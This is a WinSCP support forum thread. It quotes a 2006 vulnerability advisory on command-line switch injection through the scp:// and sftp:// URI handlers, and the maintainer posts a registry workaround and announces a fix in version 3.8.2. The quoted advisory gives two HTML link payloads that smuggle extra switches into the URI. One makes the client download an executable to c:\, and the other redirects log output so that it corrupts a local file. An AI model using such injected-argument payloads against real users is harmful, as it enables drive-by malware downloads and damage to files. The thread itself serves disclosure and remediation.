Post a reply

Before posting, please read how to report bug or request support effectively.

Bug reports without an attached log file are usually useless.

Options
Add an Attachment

If you do not want to add an Attachment to your Post, please leave the Fields blank.

(maximum 10 MB; please compress large files; only common media, archive, text and programming file formats are allowed)

Options

Topic review

martin

Fixed in 3.8.2.
martin

bollino wrote:

Whats about just to disable that "several URI handlers"
scp:// and and sftp:// as workaround.

Sure that would be workaround. You can de-register the handlers by importing following REG file and restarting (logoff/logon should be enough):

REGEDIT4


[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SCP]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SFTP]

[-HKEY_CURRENT_USER\Software\Classes\SCP]

[-HKEY_CURRENT_USER\Software\Classes\SFTP]
bollino

Hmm, just got this info via Heise News ...

Whats about just to disable that "several URI handlers"
scp:// and and sftp:// as workaround.

Indeed, I use WinSCP quite long and NEVER needed that.

bo*
girafon

Critical Security Alert in winscp => fixed in 3.8.2

Just for information :

From : Jelmer Kuperus <jkuperus at planet.nl>
Subject : WinSCP - URI Handler Command Switch Parsing
Date : 2006-06-11

Original Message

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a
specified file to an arbitrary ftp. or they may download executables to
a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%
20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a
c:\ (asuming the host is in the cache otherwise user interaction is
required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%
22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a
solution"